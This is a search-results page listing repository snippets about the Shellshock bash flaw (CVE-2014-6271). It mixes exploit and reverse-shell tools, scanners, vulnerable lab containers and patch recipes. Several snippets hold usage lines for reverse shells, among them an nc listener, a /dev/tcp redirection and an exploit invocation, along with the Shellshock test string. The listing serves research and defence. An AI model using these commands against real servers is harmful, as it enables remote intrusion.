Lucene search
+L

349 matches found

Kitploit
Kitploit
added 2026/09/01 1:52 p.m.2 views

Blind-SSRF-to-Remote-Code-Execution-Shellshock-Professional-Bug-Bounty-Report

Blind-SSRF-to-Remote-Code-Execution-Shellshock-Professional-Bug-Bounty-Report This repository contains a professional bug bounty report demonstrating the successful exploitation of a Blind SSRF vulnerability that reached an internal CGI endpoint vulnerable to Shellshock CVE-2014-6271. Remote...

10CVSS7.3AI score0.99999EPSS
SaveExploits138
Kitploit
Kitploit
added 2026/09/01 1:37 p.m.3 views

Shellshock_vuln_Exploit

🚨 Shellshock RCE Exploit CVE-2014-6271 This is a Python exploit for the Shellshock vulnerability CVE-2014-6271, which affects GNU Bash. The exploit targets CGI scripts on vulnerable web servers and establishes a reverse shell to the attacker's machine. CVE ID CVE-2014-6271 Disclaimer This tool is...

10CVSS7.2AI score0.99999EPSS
SaveExploits138
Kitploit
Kitploit
added 2026/09/01 1:33 p.m.3 views

Shellshock_CVE-2014-6271

Shellshock CVE-2014-6271 Shellshock docker-compose.yml, poc.py 파일을 다운 받아 주세요 반드시 pip install requests 를 통해 requests 라이브러리를 다운받아 주세요!!! uv를 사용하시는 분들은 uv를 통해 requests 라이브러리를 venv 안에 넣어주세요!!! CVE Official Description --- In GNU Bash versions prior to 4.3, there was a problem with handling strings th...

10CVSS7.5AI score0.99999EPSS
SaveExploits138
Kitploit
Kitploit
added 2026/09/01 1:30 p.m.3 views

bash-apocalypse

Bash Apocalypse Automated exploitation toolkit for CVE-2014-6271 Shellshock A complete security research project demonstrating the Shellshock vulnerability that affected millions of servers in 2014. Includes automated scanning, exploitation capabilities, and defensive recommendations. Demo What i...

10CVSS7.7AI score0.99999EPSS
SaveExploits138
Kitploit
Kitploit
added 2026/09/01 11:06 a.m.2 views

vaas-cve-2014-6271

Vulnerabilidad como Servicio - CVE 2014-6271 Un sistema Debian Buster Linux con una versión vulnerable de bash y una aplicación web para mostrar CVS-2014-6271, también conocido como Shellshock. Resumen Este contenedor Docker está basado en Debian Buster y ha sido modificado para usar una versión...

10CVSS7.2AI score0.99999EPSS
SaveExploits138
Kitploit
Kitploit
added 2026/09/01 10:08 a.m.3 views

ShellShock-CGI-Scan

ShellShock-CGI-Scan A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 The Bash Bug. Options: root@kitploit: -i local ip-address -p port to listen -l site list -t connection timeout Default: 15s Example: $ ./Scanner -i 127.0.0.1 -p 31337 -l sites.txt -t 5 Starting listen in...

10CVSS7.2AI score0.99999EPSS
SaveExploits138
Kitploit
Kitploit
added 2026/09/01 8:26 a.m.3 views

shellshock-cgi

shellshock-cgi A python script to enumerate CGI scripts vulnerable to CVE-2014-6271 on one specific server Usage root@kitploit: $ python testing.py --server 172.16.255.130 --listen 172.16.255.1 Example Return: root@kitploit: + Testing if 172.16.255.130 is vulnerable to CVE-2014-6271 via CGI +...

10CVSS7.2AI score0.99999EPSS
SaveExploits138References1
Kitploit
Kitploit
added 2026/09/01 8:09 a.m.4 views

shocknaww

shocknaww Simple script to check for CVE-2014-6271 Example Usage root@kitploit: ./shocknaww.py http://foo.bar/cgi-bin/foo Sample vulnerable environment From the parent directory, run the following. root@kitploit: python -m CGIHTTPServer Now use shocknaww against your localhost test server...

10CVSS7.2AI score0.99999EPSS
SaveExploits138
Kitploit
Kitploit
added 2026/09/01 6:01 a.m.4 views

ShellShock-CGI-Scan

ShellShock-CGI-Scan Un script, en C, para comprobar si los scripts CGI son vulnerables a CVE-2014-6271 El Bug de Bash. Opciones: root@kitploit: -i dirección IP local -p puerto de escucha -l lista de sitios -t tiempo de espera de conexión Por defecto: 15s Ejemplo: $ ./Scanner -i 127.0.0.1 -p 31337...

10CVSS7.2AI score0.99999EPSS
SaveExploits138
Kitploit
Kitploit
added 2026/09/01 5:56 a.m.3 views

CGIShell

CGIShell shellshock CVE-2014-6271 CGI Exploit Use like OpenSSH via CGI Page Use python cgishell.py 'http://www.google.com/cve-2014-6271/poc.cgi' Screenshot Dependence Windows needed pyreadline It is not needed chardet Future Add TestCase HTTP Login Support http transmission gzip compression chard...

10CVSS7.2AI score0.99999EPSS
SaveExploits138
Kitploit
Kitploit
added 2026/09/01 5:14 a.m.2 views

salt-shellshock

shellshock actualización de bash Esta receta intenta actualizar bash desde el paquete del SO, y recurre a compilar bash en sistemas sin actualización disponible. Funciona para nosotros en ubuntu/debian antiguos. Script de instalación de bash desde:...

10CVSS7.2AI score0.99999EPSS
SaveExploits138
Kitploit
Kitploit
added 2026/09/01 4:42 a.m.4 views

CVE-2014-6271

This repository does not have a README...

10CVSS7.3AI score0.99999EPSS
SaveExploits138
Kitploit
Kitploit
added 2026/09/01 4:37 a.m.4 views

CVE-2014-6271

EXPLOIT FOR CVE-2014-6271 USAGE : CVE-2014-6271.py full path to target uri command...

10CVSS7.2AI score0.99999EPSS
SaveExploits138
Kitploit
Kitploit
added 2026/08/31 11:33 p.m.3 views

shellshock-victim-host

shellshock-victim-host A docker container vulnerable to Shellshock - CVE-2014-6271 Run root@kitploit: podman build -t shellshock-victim . podman run -it -p 80:8080 shellshock-victim Note: Builds with docker as well. The vulnerable app will be deployed on : http://localhost:8080/victim.cgi -...

10CVSS7.2AI score0.99999EPSS
SaveExploits138
Kitploit
Kitploit
added 2026/08/31 7:33 p.m.3 views

cookbook-bash-CVE-2014-6271

bash-CVE-2014-6271 Cookbook This Chef cookbook contains a default recipe that will fail your Chef run if a bash is found and that bash is vulnerable to the remote exploit described in CVE-2014-6271. The places to look for bash can be configured in the node'bash-CVE-2014-6271''bashes' attribute se...

10CVSS7.3AI score0.99999EPSS
SaveExploits138
Kitploit
Kitploit
added 2026/08/31 3:45 p.m.2 views

CVE-2014-6271

Hellshocker 0.1.1 Tool to exploit Shellshock vulnerability Tired of using weak shellshock exploits or just "/bin/bash & /dev/tcp/IP/port 0&1" your way into the server? Yes, you need to upload and execute something more complex to the server, and base64 encoding a huge file is impossible for your...

10CVSS7.4AI score0.99999EPSS
SaveExploits138
Kitploit
Kitploit
added 2026/08/31 2:34 p.m.2 views

CVE-2014-6271

CVE-2014-6271 python2.7 Start listening on your machine. root@kitploit: nc -l -p 4444 Run python script by the rule below: python shellpoc.py root@kitploit: python shellpoc.py 10.10.10.101 /cgi-bin/status 10.10.10.1/4444 Enjoy...

10CVSS7.2AI score0.99999EPSS
SaveExploits138
Kitploit
Kitploit
added 2026/08/31 2:08 p.m.2 views

CVE-2014-6271

CS4238 CS4238 Computer Security Practices...

10CVSS7.2AI score0.99999EPSS
SaveExploits138
Kitploit
Kitploit
added 2026/08/31 12:05 p.m.2 views

CVE-2014-6271-SHELLSHOCK

CVE-2014-6271-SHELLSHOCK 🐚 Shellshock Exploitation Script 🎯💻🔍 This Python script exploits the Shellshock vulnerability CVE-2014-6271 to execute commands remotely or establish a reverse shell on a vulnerable target. 🛠️⚠️ ⚠ Disclaimer 🚨❗ This script is intended for educational and authorized...

10CVSS7.4AI score0.99999EPSS
SaveExploits138
Kitploit
Kitploit
added 2026/08/31 11:53 a.m.3 views

CVE-2014-6271

CVE-2014-6271 An automated way to fix bash Testing for the Vulnerability You can determine if you are vulnerable by executing this test: env x=' :;; echo vulnerable' bash -c 'echo hello' Fixing Vulnerability Run this on the command line. You may be prompted to enter your password. bash curl -s...

10CVSS7.2AI score0.99999EPSS
SaveExploits138References1
Rows per page
Query Builder